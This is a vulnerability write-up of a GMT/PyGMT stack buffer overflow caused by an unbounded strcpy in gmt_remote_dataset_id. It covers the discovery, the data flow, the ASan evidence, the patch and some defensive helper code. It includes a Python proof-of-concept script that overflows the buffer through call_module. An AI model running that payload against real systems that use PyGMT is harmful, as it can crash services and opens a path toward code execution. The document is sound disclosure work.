Original advisory (GHSA): https://github.com/GenericMappingTools/gmt/security/advisories/GHSA-fqxx-62x7-9gwg
TL;DR
A stack-based buffer overflow in GMT (gmt_remote_dataset_id) can be triggered via PyGMT by supplying an oversized input.
This results in memory corruption and may lead to Remote Code Execution (RCE) depending on the environment.
Overview
While analyzing Generic Mapping Tools (GMT) and its Python binding PyGMT, I discovered a stack-based buffer overflow vulnerability.
The issue occurs due to unsafe use of strcpy without bounds checking in a C-level function.
Because PyGMT directly passes user input into GMT internals, this vulnerability becomes externally reachable.
Vulnerability Information
- Type: Stack Buffer Overflow → Potential RCE
- CWE: CWE-121
- Affected Version: 6.6.0
- Root Cause: Unsafe strcpy usage
Background
Initially, I reported an SSRF issue in PyGMT. However, the maintainers clarified that URL handling is an intended feature inherited from GMT's design.
This response led to a key realization:
If input is intentionally unrestricted at the Python layer, the real attack surface likely exists in the underlying C library.
So I shifted the analysis target from PyGMT to GMT itself.
Discovery Process
The investigation focused on how user input flows through PyGMT into GMT.
The key entry point:
Session.call_module()
This function forwards arguments directly into the GMT C API.
Hypothesis
"What happens if we pass an extremely long string?"
Test Payload
padding = "A" * 4096
Result
- Program crashed with Segmentation Fault
- AddressSanitizer confirmed stack-buffer-overflow
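A crash inside native code takes the whole Python interpreter down with it, so a length probe like this is easier to observe from a separate process. The following is a minimal sketch of such a harness, not the setup used in the original test: `run_isolated` and `CRASHING_SNIPPET` are hypothetical names, the crashing snippet is a stand-in that sends SIGSEGV to itself instead of calling PyGMT, and the signal decoding assumes a POSIX system.

```python
import signal
import subprocess
import sys


def run_isolated(snippet: str, timeout: float = 30.0) -> str:
    """Run a Python snippet in a child interpreter and describe how it exited."""
    proc = subprocess.run(
        [sys.executable, "-c", snippet],
        capture_output=True,
        timeout=timeout,
    )
    if proc.returncode < 0:
        # On POSIX, a negative return code means the child was killed by a signal.
        return f"killed by {signal.Signals(-proc.returncode).name}"
    return f"exited with status {proc.returncode}"


# Stand-in for a crashing native call: the child sends SIGSEGV to itself.
# In a real probe the snippet would contain the PyGMT call under test.
CRASHING_SNIPPET = "import os, signal; os.kill(os.getpid(), signal.SIGSEGV)"

if __name__ == "__main__":
    print(run_isolated("pass"))
    print(run_isolated(CRASHING_SNIPPET))
```

An AddressSanitizer build typically prints its report and exits with a non-zero status rather than dying from a signal, so both outcomes are worth recording when probing with different input lengths.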
Further code review identified the vulnerable function:
gmt_remote_dataset_id()
Root Cause
The vulnerability originates from unsafe memory handling:
char file[PATH_MAX];
strcpy(file, input);
Problem
- input is user-controlled
- No length validation
- Fixed-size stack buffer
Result
If input is PATH_MAX bytes or longer (strcpy also writes a terminating NUL):
- Stack memory is overwritten
- Adjacent memory corruption occurs
Data Flow
User Input (PyGMT)
↓
Session.call_module()
↓
GMT module ("which")
↓
gmt_remote_dataset_id()
↓
strcpy() → stack buffer overflow
The critical issue is that no validation exists at any layer.
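Since nothing in this chain checks the argument length, an application that forwards untrusted strings can add its own check before the call. The sketch below shows one way to do that. It is not part of PyGMT or GMT: `check_module_args` and `MAX_ARG_BYTES` are hypothetical names, and the 1024-byte limit is an assumed value chosen to sit well below a typical PATH_MAX of 4096.

```python
MAX_ARG_BYTES = 1024  # hypothetical limit, well below a typical PATH_MAX of 4096


def check_module_args(args, limit=MAX_ARG_BYTES):
    """Return the arguments as a list, or raise ValueError if one is unsafe to forward."""
    for arg in args:
        # The C side sees encoded bytes, so measure bytes rather than characters.
        encoded = arg.encode("utf-8")
        if b"\0" in encoded:
            raise ValueError("argument contains an embedded NUL byte")
        if len(encoded) > limit:
            raise ValueError(f"argument is {len(encoded)} bytes; limit is {limit}")
    return list(args)


# Intended use (requires PyGMT, so it is shown as a comment only):
#     with Session() as lib:
#         lib.call_module("which", check_module_args([user_supplied_name]))
```

A check like this is defense in depth for callers who cannot upgrade immediately. It does not replace the fix in the C library.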
Exploitation
PoC
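import struct
from pygmt.clib import Session
with Session() as lib:
    # Filler sized to match a 4096-byte stack buffer
    padding = "A" * 4096
    # 100 copies of an 8-byte marker value (0x4141414141414141)
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    # "which" hands the argument on to gmt_remote_dataset_id()
    lib.call_module("which", [payload])
Result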
Segmentation fault
AddressSanitizer Output
ERROR: AddressSanitizer: stack-buffer-overflow
Function: gmt_remote_dataset_id
This confirms that the crash is caused by an out-of-bounds write on stack memory.
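To put numbers on the overflow, the PoC payload can be measured without calling GMT at all. The arithmetic below is a sketch under two stated assumptions: PATH_MAX is 4096 (the usual Linux value, named `ASSUMED_PATH_MAX` here), and the whole argument reaches strcpy unchanged as UTF-8 bytes.

```python
import struct

ASSUMED_PATH_MAX = 4096  # assumption: typical Linux value

# Same construction as the PoC, minus the PyGMT call.
padding = "A" * 4096
fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
payload = padding + fake_ret.decode("latin-1")

encoded = payload.encode("utf-8")
bytes_written = len(encoded) + 1  # strcpy also copies the terminating NUL
overrun = bytes_written - ASSUMED_PATH_MAX

print("padding bytes:", len(padding))
print("marker bytes:", len(fake_ret))
print("payload bytes:", len(encoded))
print("bytes written past the buffer:", overrun)
print("payload is uniform:", set(payload) == {"A"})
```

Because every marker byte is 0x41, the payload is one uniform run of "A" characters. Locating the exact offset of a saved return address would need a non-repeating pattern instead.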
Impact
Direct Impact
- Application crash (DoS)
- Memory corruption
Advanced Impact
- Control flow hijacking
- Return address overwrite
- Potential Remote Code Execution (RCE)
Stack-based overflows are especially dangerous when the memory layout is predictable, for example when stack canaries or ASLR are disabled.
Attack Surface
This vulnerability is exploitable in:
- Applications using PyGMT
- Systems passing user input into GMT modules
- Automated geospatial data pipelines
Because the entry point is Python, exploitation becomes significantly easier than targeting C binaries directly.
Bypass Analysis
This is not a logic bypass — it is a missing validation issue.
Observed problems:
- Use of strcpy (no bounds check)
- No input length validation
- No defensive programming
Patch Analysis
The vulnerability was fixed by replacing unsafe copying logic.
Before
strcpy(file, input);
After
strncpy(file, input, sizeof(file) - 1);
file[sizeof(file) - 1] = '\0';
Key Improvements
- Enforces boundary checks
- Prevents buffer overflow
- Ensures null termination
This patch effectively mitigates the issue.
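The behavior of the patched copy can be modeled in a few lines of Python to show what happens to an oversized input. This is an illustrative model of the strncpy-plus-terminator pattern, not GMT code: `bounded_copy` and `c_string` are hypothetical helpers, and a zero-filled bytearray stands in for the destination buffer.

```python
def bounded_copy(src: bytes, size: int) -> bytes:
    """Model strncpy(dst, src, size - 1) followed by an explicit NUL at dst[size - 1]."""
    if size < 1:
        raise ValueError("destination must hold at least the terminator")
    dst = bytearray(size)  # zero-filled stand-in for the destination buffer
    nul = src.find(b"\0")
    src_len = len(src) if nul == -1 else nul  # a C string ends at its first NUL
    count = min(src_len, size - 1)  # never copy more than size - 1 bytes
    dst[:count] = src[:count]
    dst[size - 1] = 0  # explicit terminator, as in the patch
    return bytes(dst)


def c_string(buf: bytes) -> bytes:
    """Return the bytes a C reader would see, up to the first NUL."""
    return buf.split(b"\0", 1)[0]


if __name__ == "__main__":
    result = bounded_copy(b"A" * 5000, 4096)
    print(len(result), len(c_string(result)))
```

The write now stays inside the buffer, but an over-long name is silently truncated rather than rejected. Code that needs to refuse such input must still compare the length against the buffer size before copying.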
Why This Matters
This vulnerability highlights a critical misconception:
"High-level languages make things safe."
In reality:
- Python → passes input directly
- C → executes unsafe memory operations
This creates a hidden attack surface where safe-looking APIs expose unsafe internals.
Key Insight
High-level interfaces do not eliminate low-level vulnerabilities — they expose them.
Conclusion
This case demonstrates how a classic memory safety issue in C can become externally exploitable through modern language bindings.
Although it may initially appear as a crash-level bug, its impact can escalate significantly depending on runtime conditions.
Contribution
- Identified stack-based buffer overflow in GMT
- Demonstrated crash via PyGMT interface
- Confirmed memory corruption with ASan
- Analyzed root cause and patch
References
- GMT Security Advisory
- Patch Commit
- GHSA: Stack-based Buffer Overflow in gmt_remote_dataset_id